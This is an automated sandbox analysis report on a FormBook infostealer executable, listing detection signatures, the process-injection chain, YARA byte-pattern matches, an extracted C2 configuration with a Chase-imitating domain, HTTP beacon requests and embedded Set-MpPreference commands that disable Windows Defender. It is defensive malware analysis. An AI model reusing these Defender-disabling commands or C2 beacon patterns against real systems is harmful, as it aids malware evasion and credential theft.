Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0098764345678.exe

Overview

General Information

Sample Name:0098764345678.exe
Analysis ID:680503
MD5:69ec82c711ed34399013471e214a7e64
SHA1:f7fd0fc9eb038b2debf63b0ebec21f48c3fffdd4
SHA256:f71f9af9db20ea569e9a4b528898183f182a9d98a6f8668275c55690b5a59c49
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • 0098764345678.exe (PID: 5832 cmdline: "C:\Users\user\Desktop\0098764345678.exe" MD5: 69EC82C711ED34399013471E214A7E64)
    • 0098764345678.exe (PID: 1260 cmdline: {path} MD5: 69EC82C711ED34399013471E214A7E64)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 5440 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 1672 cmdline: /c del "C:\Users\user\Desktop\0098764345678.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.secure-id6793-chase.com/zzun/"], "decoy": ["JnNtRHyNupy0GqRzAcasu7hb4rc=", "Qv593NGLE7p9UNSaVkPXljAJm2QCNnc=", "ePArIFWvjkkMgVEVhw4M4Jk=", "26rqUwJ7dD0AiDI=", "pBAxMHeK741QFw==", "kHD7TPt5846pUMTX", "56UnjFjHL1i0j659h3LymRnHpQj+SshC", "4vKlKHflPqmWXRbrRwfPtrhb4rc=", "6LBd4qButFAi", "phMzGll8Ue7Fu+inq5cdnPaSugG3", "NKswiQGCvZoG5FgsdHEI", "rtTHnuUY8M1qVcXV", "SOmECrlAt2oGAA==", "L1ep9adutFAi", "/UE+/AyvE6uEl28weFI=", "IP+xMPQxJR4NE6TK", "xvW5GN9/rqA5YUoOVt185Sf7Uw==", "fRFNW9DhxL6VF7LA", "KFYTfkaY741QFw==", "W4JGvMBmt2oGAA==", "lnoad0Hkgrwl9uXlghvqdz33UA==", "1msShiu+9wisELGDjYAK", "FBXFOinAK8ylnMZzi35Okw==", "V8Y7/cBnt2oGAA==", "VfuI0k5pSmi6+aNjIlAT2mspCZBZLGA=", "de74yg89D61bSiU=", "V2UPjYUvwh21qdxUr4Mf", "DcFXvTxFMlyfL5JJIU0=", "GldbH/CCt2oGAA==", "sxdEIBwn+o+pUMTX", "UmViK+1/Knr8814sdHEI", "jrfKoZ6paLyeEBETgw4M4Jk=", "SR27MizpGwCa19Kb1A==", "2DGo9XUNxBOe19Kb1A==", "7tBn2cG8jasWHE7w559Aig==", "8qtAoVHxl/KGerbsfA4M4Jk=", "fC3AH6Utt2oGAA==", "HltlPHZ7FpSpUMTX", "xd0B+Pr30gBfQGYXafOW1dOSflv+SshC", "DKXWyiOecY7319Kb1A==", "Pvx505EaswiHYF3z559Aig==", "aJ6kaz7CWKsP9g9Ur4Mf", "qcvfxb9TwUoDCrfXw/uTdSkTCJBZLGA=", "I++iH8xJxFp73nyUjJOg3/PS/3W7", "K1N1guwbLz0AiDI=", "vp2SfavTmBXNzLeXmIoUhsB7", "UlAVhgIfLT0AiDI=", "6BKH5GjHt2YIo/qhA69S+5E=", "6U29K+qVw5hT4gQ83A==", "G9NTmhwpAwY6r4I69kT4dz33UA==", "0qstoaNBmBrMlfwTKhrAtLhb4rc=", "ZvMhGW52cyAAXkVV3Jc96Lhb4rc=", "N9Z3/PmEt2oGAA==", "ohlOhcaP741QFw==", "9WF3PohVjEolhCY=", "am0ek4wtmkEI9GMVhw4M4Jk=", "ROotH4+jhp7vnzVdww==", "uvkuFhGmJlyjpFFpi35Okw==", "ICHQQTIjaxTryG8weFI=", "AhIZ8uh974+pUMTX", "pEBtSFHr/5s0GQ==", "qAcuLnqLNeOpUMTX", "bcHv6WdbHoWEylgsdHEI", "Nz/rbWh3s4WFDL9uPlAhXKNz"]}
SourceRuleDescriptionAuthorStrings
00000012.00000002.529641329.0000000000800000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000012.00000002.529641329.0000000000800000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6581:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1cff0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x9e1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x165d7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000012.00000002.529641329.0000000000800000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8c38:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8fd2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x163d5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15e81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x164d7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1664f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x99ea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x150fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa762:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1bc47:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1cd5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000012.00000002.529641329.0000000000800000.00000040.00000001.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18a49:$sqlite3step: 68 34 1C 7B E1
    • 0x18b5c:$sqlite3step: 68 34 1C 7B E1
    • 0x18a78:$sqlite3text: 68 38 2A 90 C5
    • 0x18b9d:$sqlite3text: 68 38 2A 90 C5
    • 0x18a8b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18bb3:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000000.364459819.000000000D20D000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 27 entries
      SourceRuleDescriptionAuthorStrings
      4.0.0098764345678.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.0.0098764345678.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x5781:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1c1f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x901f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x157d7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        4.0.0098764345678.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7e38:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x81d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x155d5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15081:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x156d7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1584f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x8bea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x142fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9962:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ae47:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bf5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.0.0098764345678.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17c49:$sqlite3step: 68 34 1C 7B E1
        • 0x17d5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17c78:$sqlite3text: 68 38 2A 90 C5
        • 0x17d9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17c8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17db3:$sqlite3blob: 68 53 D8 7F 8C
        0.2.0098764345678.exe.26c6388.0.raw.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
        • 0xce28:$reg1: SOFTWARE\Microsoft\Windows Defender\Features
        • 0xce6c:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
        • 0xceb4:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
        • 0xd140:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
        • 0xd1a4:$s2: Set-MpPreference -DisableArchiveScanning $true
        • 0xd1fc:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true
        • 0xd254:$s4: Set-MpPreference -DisableScriptScanning $true
        • 0xd2a0:$s5: Set-MpPreference -SubmitSamplesConsent 2
        • 0xd2e0:$s6: Set-MpPreference -MAPSReporting 0
        • 0xd32c:$s7: Set-MpPreference -HighThreatDefaultAction 6
        • 0xd384:$s8: Set-MpPreference -ModerateThreatDefaultAction 6
        • 0xd3d4:$s9: Set-MpPreference -LowThreatDefaultAction 6
        • 0xd424:$s10: Set-MpPreference -SevereThreatDefaultAction 6
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 0098764345678.exeReversingLabs: Detection: 29%
        Source: Yara matchFile source: 4.0.0098764345678.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000012.00000002.529641329.0000000000800000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.364459819.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.302568532.0000000003689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.389433481.000000000D20D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.531711624.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000000.284514841.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.532244734.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: 0098764345678.exeAvira: detected
        Source: http://www.secure-id6793-chase.com/zzun/?3fZ4-PZ=hS6fQYKqHv+OsAYXbPa1KllQZ4uj6G6pTbgTcLclchxJ2x6fi0s26xbgzAwHm+sFKe+r&oDH=0v5TjpAvira URL Cloud: Label: phishing
        Source: http://www.whipbull.com/zzun/?oDH=0v5Tjp&3fZ4-PZ=Kiv179iAIMPDqB30KPMwtVjQGuO+8qaWaLcZydmce/CQLYP70aekBaXIYi060oxX9tqEAvira URL Cloud: Label: malware
        Source: www.secure-id6793-chase.com/zzun/Avira URL Cloud: Label: phishing
        Source: 0098764345678.exeJoe Sandbox ML: detected
        Source: 4.0.0098764345678.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 00000012.00000002.529641329.0000000000800000.00000040.00000001.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.secure-id6793-chase.com/zzun/"], "decoy": ["JnNtRHyNupy0GqRzAcasu7hb4rc=", "Qv593NGLE7p9UNSaVkPXljAJm2QCNnc=", "ePArIFWvjkkMgVEVhw4M4Jk=", "26rqUwJ7dD0AiDI=", "pBAxMHeK741QFw==", "kHD7TPt5846pUMTX", "56UnjFjHL1i0j659h3LymRnHpQj+SshC", "4vKlKHflPqmWXRbrRwfPtrhb4rc=", "6LBd4qButFAi", "phMzGll8Ue7Fu+inq5cdnPaSugG3", "NKswiQGCvZoG5FgsdHEI", "rtTHnuUY8M1qVcXV", "SOmECrlAt2oGAA==", "L1ep9adutFAi", "/UE+/AyvE6uEl28weFI=", "IP+xMPQxJR4NE6TK", "xvW5GN9/rqA5YUoOVt185Sf7Uw==", "fRFNW9DhxL6VF7LA", "KFYTfkaY741QFw==", "W4JGvMBmt2oGAA==", "lnoad0Hkgrwl9uXlghvqdz33UA==", "1msShiu+9wisELGDjYAK", "FBXFOinAK8ylnMZzi35Okw==", "V8Y7/cBnt2oGAA==", "VfuI0k5pSmi6+aNjIlAT2mspCZBZLGA=", "de74yg89D61bSiU=", "V2UPjYUvwh21qdxUr4Mf", "DcFXvTxFMlyfL5JJIU0=", "GldbH/CCt2oGAA==", "sxdEIBwn+o+pUMTX", "UmViK+1/Knr8814sdHEI", "jrfKoZ6paLyeEBETgw4M4Jk=", "SR27MizpGwCa19Kb1A==", "2DGo9XUNxBOe19Kb1A==", "7tBn2cG8jasWHE7w559Aig==", "8qtAoVHxl/KGerbsfA4M4Jk=", "fC3AH6Utt2oGAA==", "HltlPHZ7FpSpUMTX", "xd0B+Pr30gBfQGYXafOW1dOSflv+SshC", "DKXWyiOecY7319Kb1A==", "Pvx505EaswiHYF3z559Aig==", "aJ6kaz7CWKsP9g9Ur4Mf", "qcvfxb9TwUoDCrfXw/uTdSkTCJBZLGA=", "I++iH8xJxFp73nyUjJOg3/PS/3W7", "K1N1guwbLz0AiDI=", "vp2SfavTmBXNzLeXmIoUhsB7", "UlAVhgIfLT0AiDI=", "6BKH5GjHt2YIo/qhA69S+5E=", "6U29K+qVw5hT4gQ83A==", "G9NTmhwpAwY6r4I69kT4dz33UA==", "0qstoaNBmBrMlfwTKhrAtLhb4rc=", "ZvMhGW52cyAAXkVV3Jc96Lhb4rc=", "N9Z3/PmEt2oGAA==", "ohlOhcaP741QFw==", "9WF3PohVjEolhCY=", "am0ek4wtmkEI9GMVhw4M4Jk=", "ROotH4+jhp7vnzVdww==", "uvkuFhGmJlyjpFFpi35Okw==", "ICHQQTIjaxTryG8weFI=", "AhIZ8uh974+pUMTX", "pEBtSFHr/5s0GQ==", "qAcuLnqLNeOpUMTX", "bcHv6WdbHoWEylgsdHEI", "Nz/rbWh3s4WFDL9uPlAhXKNz"]}
        Source: 0098764345678.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 0098764345678.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: wntdll.pdbUGP source: 0098764345678.exe, 00000004.00000003.296024100.0000000001129000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000004.00000002.405035739.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 00000012.00000002.540716207.000000000481F000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.404501022.0000000000F9F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.406891503.0000000004567000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000012.00000002.537834669.0000000004700000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: 0098764345678.exe, 0098764345678.exe, 00000004.00000003.296024100.0000000001129000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000004.00000002.405035739.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 00000012.00000002.540716207.000000000481F000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.404501022.0000000000F9F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.406891503.0000000004567000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000012.00000002.537834669.0000000004700000.00000040.00000800.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
        Source: C:\Users\user\Desktop\0098764345678.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h

        Networking

        barindex
        Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.221 80
        Source: C:\Windows\explorer.exeDomain query: www.whipbull.com
        Source: C:\Windows\explorer.exeNetwork Connect: 194.195.211.26 80
        Source: C:\Windows\explorer.exeDomain query: www.secure-id6793-chase.com
        Source: Malware configuration extractorURLs: www.secure-id6793-chase.com/zzun/
        Source: Joe Sandbox ViewASN Name: NEXINTO-DE NEXINTO-DE
        Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
        Source: global trafficHTTP traffic detected: GET /zzun/?oDH=0v5Tjp&3fZ4-PZ=Kiv179iAIMPDqB30KPMwtVjQGuO+8qaWaLcZydmce/CQLYP70aekBaXIYi060oxX9tqE HTTP/1.1Host: www.whipbull.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /zzun/?3fZ4-PZ=hS6fQYKqHv+OsAYXbPa1KllQZ4uj6G6pTbgTcLclchxJ2x6fi0s26xbgzAwHm+sFKe+r&oDH=0v5Tjp HTTP/1.1Host: www.secure-id6793-chase.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /zzun/?3fZ4-PZ=hS6fQYKqHv+OsAYXbPa1KllQZ4uj6G6pTbgTcLclchxJ2x6fi0s26xbgzAwHm+sFKe+r&oDH=0v5Tjp HTTP/1.1Host: www.secure-id6793-chase.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: Joe Sandbox ViewIP Address: 194.195.211.26 194.195.211.26
        Source: Joe Sandbox ViewIP Address: 194.195.211.26 194.195.211.26
        Source: Joe Sandbox ViewIP Address: 103.224.212.221 103.224.212.221
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
        Source: msiexec.exe, 00000012.00000002.544412109.0000000004DB2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://ww25.whipbull.com/zzun/?oDH=0v5Tjp&3fZ4-PZ=Kiv179iAIMPDqB30KPMwtVjQGuO
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
        Source: 0098764345678.exe, 00000000.00000003.288166992.0000000005630000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000002.308556522.0000000005641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comFXD
        Source: 0098764345678.exe, 00000000.00000003.288166992.0000000005630000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000002.308556522.0000000005641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgritakD
        Source: 0098764345678.exe, 00000000.00000003.263438887.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263144005.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.262991538.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263340582.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263111987.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263505726.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263403072.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.262961210.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263652450.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263454212.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263175663.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263090313.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263265218.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263287108.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263576385.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263025198.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.262968838.000000000564B000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263526587.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263471443.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263596357.0000000005665000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
        Source: 0098764345678.exe, 00000000.00000003.263438887.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263144005.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263340582.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263111987.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263505726.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263403072.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263652450.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263454212.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263175663.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263090313.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263265218.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263287108.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263576385.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263025198.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263526587.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263471443.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263596357.0000000005665000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comB
        Source: 0098764345678.exe, 00000000.00000003.263070688.000000000564B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comLQ
        Source: 0098764345678.exe, 00000000.00000003.262961210.0000000005665000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comX
        Source: 0098764345678.exe, 00000000.00000003.263438887.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263144005.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.262991538.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263340582.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263111987.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263505726.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263403072.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263652450.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263454212.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263175663.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263090313.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263265218.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263287108.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263576385.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263025198.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263526587.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263471443.0000000005665000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.263596357.0000000005665000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comc
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.288166992.0000000005630000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.268355050.0000000005649000.00000004.00000800.00020000.00000000.sdmp, 0098764345678.exe, 00000000.00000003.268444960.0000000005649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
        Source: 0098764345678.exe, 00000000.00000002.308772768.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
